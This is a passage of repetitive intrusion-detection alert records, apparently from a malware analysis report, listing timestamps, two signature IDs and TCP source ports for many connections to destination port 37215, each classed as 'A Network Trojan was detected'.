          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.100063
          SID:2829579
          Source Port:39332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.466249
          SID:2829579
          Source Port:46766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.281999
          SID:2829579
          Source Port:35584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869311
          SID:2835222
          Source Port:34082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929219
          SID:2829579
          Source Port:37030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.914228
          SID:2835222
          Source Port:54406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.286622
          SID:2829579
          Source Port:41936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103803
          SID:2829579
          Source Port:37628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225079
          SID:2829579
          Source Port:37426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714991
          SID:2835222
          Source Port:55152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.298394
          SID:2829579
          Source Port:50394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539697
          SID:2835222
          Source Port:46918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080479
          SID:2835222
          Source Port:49636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715698
          SID:2835222
          Source Port:55560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.694767
          SID:2829579
          Source Port:47394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.599825
          SID:2835222
          Source Port:44986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.914702
          SID:2835222
          Source Port:45998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.478699
          SID:2835222
          Source Port:50760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.285966
          SID:2829579
          Source Port:51312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.988964
          SID:2829579
          Source Port:41970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413905
          SID:2835222
          Source Port:34054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.307334
          SID:2835222
          Source Port:41338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.222648
          SID:2835222
          Source Port:38250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.983829
          SID:2829579
          Source Port:42842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.399114
          SID:2835222
          Source Port:45482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102227
          SID:2835222
          Source Port:48738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944813
          SID:2835222
          Source Port:36862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.291415
          SID:2829579
          Source Port:55570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.157060
          SID:2835222
          Source Port:39080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947102
          SID:2835222
          Source Port:60450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.987509
          SID:2835222
          Source Port:43048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.031487
          SID:2829579
          Source Port:39176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.887774
          SID:2829579
          Source Port:60656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.036299
          SID:2829579
          Source Port:34108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715539
          SID:2829579
          Source Port:55550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.165049
          SID:2835222
          Source Port:42630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.253085
          SID:2829579
          Source Port:54288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643686
          SID:2829579
          Source Port:50292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.646029
          SID:2829579
          Source Port:47066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720137
          SID:2829579
          Source Port:54750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.075774
          SID:2835222
          Source Port:57408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.281123
          SID:2835222
          Source Port:51336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947358
          SID:2835222
          Source Port:53708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644298
          SID:2835222
          Source Port:55006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.560389
          SID:2829579
          Source Port:42328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397217
          SID:2835222
          Source Port:38386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713793
          SID:2829579
          Source Port:45154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.647625
          SID:2835222
          Source Port:46534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223580
          SID:2835222
          Source Port:58846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644782
          SID:2829579
          Source Port:40196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720806
          SID:2829579
          Source Port:56790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.859247
          SID:2829579
          Source Port:57806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.993542
          SID:2835222
          Source Port:56442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867205
          SID:2829579
          Source Port:34994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.411988
          SID:2835222
          Source Port:33294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.909850
          SID:2835222
          Source Port:34706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.667710
          SID:2829579
          Source Port:38262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.207972
          SID:2835222
          Source Port:45202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944698
          SID:2835222
          Source Port:55306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.162790
          SID:2829579
          Source Port:41686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719695
          SID:2835222
          Source Port:57886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.282166
          SID:2835222
          Source Port:52646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.569357
          SID:2835222
          Source Port:58376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944144
          SID:2835222
          Source Port:45662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103927
          SID:2829579
          Source Port:50272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.990708
          SID:2835222
          Source Port:37198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.475971
          SID:2829579
          Source Port:49560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539145
          SID:2829579
          Source Port:40238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948510
          SID:2835222
          Source Port:43372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945904
          SID:2829579
          Source Port:38158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.285016
          SID:2835222
          Source Port:38694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716131
          SID:2829579
          Source Port:45058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.987184
          SID:2835222
          Source Port:52798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.475803
          SID:2829579
          Source Port:35480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248939
          SID:2835222
          Source Port:35982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.916577
          SID:2829579
          Source Port:56122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.931312
          SID:2829579
          Source Port:51904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.537827
          SID:2835222
          Source Port:55364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.696430
          SID:2835222
          Source Port:47558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.241757
          SID:2835222
          Source Port:35154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035017
          SID:2829579
          Source Port:47600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988988
          SID:2829579
          Source Port:60084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867710
          SID:2835222
          Source Port:43344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.030354
          SID:2835222
          Source Port:56994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.564185
          SID:2835222
          Source Port:49324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.274381
          SID:2835222
          Source Port:35464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.400399
          SID:2835222
          Source Port:58896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.017410
          SID:2829579
          Source Port:52604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.693952
          SID:2835222
          Source Port:40690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.595575
          SID:2829579
          Source Port:48046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987848
          SID:2829579
          Source Port:34262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.993532
          SID:2829579
          Source Port:52652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034601
          SID:2829579
          Source Port:45362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.473509
          SID:2829579
          Source Port:39494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713079
          SID:2829579
          Source Port:33664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928683
          SID:2829579
          Source Port:50162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162045
          SID:2835222
          Source Port:46538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945774
          SID:2829579
          Source Port:39470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.027218
          SID:2835222
          Source Port:49520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.678190
          SID:2829579
          Source Port:42972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.300993
          SID:2835222
          Source Port:40364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166867
          SID:2829579
          Source Port:41450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.306576
          SID:2835222
          Source Port:33588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.312765
          SID:2829579
          Source Port:54498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289007
          SID:2829579
          Source Port:48518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077148
          SID:2835222
          Source Port:44146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.600854
          SID:2829579
          Source Port:39956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.119917
          SID:2835222
          Source Port:34716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929374
          SID:2829579
          Source Port:45806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223787
          SID:2835222
          Source Port:48412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.866034
          SID:2829579
          Source Port:50032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.247326
          SID:2835222
          Source Port:47028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.280987
          SID:2829579
          Source Port:46356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.991457
          SID:2829579
          Source Port:55556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.684797
          SID:2835222
          Source Port:60492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.909378
          SID:2835222
          Source Port:58122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948821
          SID:2835222
          Source Port:48424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.474683
          SID:2835222
          Source Port:51708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.568907
          SID:2835222
          Source Port:51698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.692120
          SID:2835222
          Source Port:39332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716960
          SID:2829579
          Source Port:38334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289598
          SID:2835222
          Source Port:55822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714234
          SID:2829579
          Source Port:39094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713527
          SID:2829579
          Source Port:41238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.986633
          SID:2835222
          Source Port:54982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.564828
          SID:2829579
          Source Port:40920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820013
          SID:2835222
          Source Port:44484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.986499
          SID:2835222
          Source Port:59938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.277226
          SID:2835222
          Source Port:49332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.027918
          SID:2829579
          Source Port:50396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.955136
          SID:2829579
          Source Port:50926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.597370
          SID:2829579
          Source Port:53496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.162590
          SID:2829579
          Source Port:36840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415526
          SID:2829579
          Source Port:48176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.283401
          SID:2835222
          Source Port:54964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.474618
          SID:2835222
          Source Port:42460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077778
          SID:2829579
          Source Port:50826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.990100
          SID:2835222
          Source Port:54318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.924639
          SID:2835222
          Source Port:34190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.863862
          SID:2829579
          Source Port:43702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.602649
          SID:2835222
          Source Port:38218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945775
          SID:2829579
          Source Port:36316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.253054
          SID:2829579
          Source Port:47610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399760
          SID:2829579
          Source Port:41798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.564279
          SID:2829579
          Source Port:50004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.039014
          SID:2829579
          Source Port:48752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.568308
          SID:2829579
          Source Port:37730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823546
          SID:2829579
          Source Port:47240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928639
          SID:2835222
          Source Port:40418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.909280
          SID:2829579
          Source Port:47436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.904468
          SID:2829579
          Source Port:60052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.951960
          SID:2829579
          Source Port:51684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.916437
          SID:2835222
          Source Port:45722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.013008
          SID:2829579
          Source Port:43382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869709
          SID:2835222
          Source Port:60108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164121
          SID:2829579
          Source Port:55920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947760
          SID:2829579
          Source Port:41720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225475
          SID:2835222
          Source Port:48820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.894408
          SID:2835222
          Source Port:46532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.996321
          SID:2835222
          Source Port:48436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.899222
          SID:2829579
          Source Port:40252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718978
          SID:2829579
          Source Port:39662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.037671
          SID:2835222
          Source Port:53412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.941967
          SID:2835222
          Source Port:45952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.924318
          SID:2835222
          Source Port:52268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.253067
          SID:2835222
          Source Port:48308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038485
          SID:2835222
          Source Port:32850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.601035
          SID:2829579
          Source Port:41838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.029677
          SID:2829579
          Source Port:59712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288012
          SID:2835222
          Source Port:38074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.036779
          SID:2829579
          Source Port:33858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.606112
          SID:2829579
          Source Port:40980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947440
          SID:2835222
          Source Port:37768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.156816
          SID:2829579
          Source Port:33988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.309512
          SID:2829579
          Source Port:60638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.914018
          SID:2829579
          Source Port:48770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.294033
          SID:2835222
          Source Port:53572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.270088
          SID:2829579
          Source Port:51142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.598657
          SID:2835222
          Source Port:60386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.471705
          SID:2835222
          Source Port:44082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713839
          SID:2835222
          Source Port:49962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.602665
          SID:2835222
          Source Port:40036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.283294
          SID:2829579
          Source Port:41568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205596
          SID:2835222
          Source Port:37650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104750
          SID:2829579
          Source Port:52348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077073
          SID:2829579
          Source Port:36588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.677459
          SID:2829579
          Source Port:50518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.026942
          SID:2829579
          Source Port:45570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.866233
          SID:2829579
          Source Port:36378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035102
          SID:2835222
          Source Port:53362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.131888
          SID:2835222
          Source Port:60750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946555
          SID:2835222
          Source Port:58486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.012790
          SID:2835222
          Source Port:49012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.290204
          SID:2829579
          Source Port:35284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929325
          SID:2835222
          Source Port:46496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.288819
          SID:2835222
          Source Port:48668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.886943
          SID:2829579
          Source Port:44128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
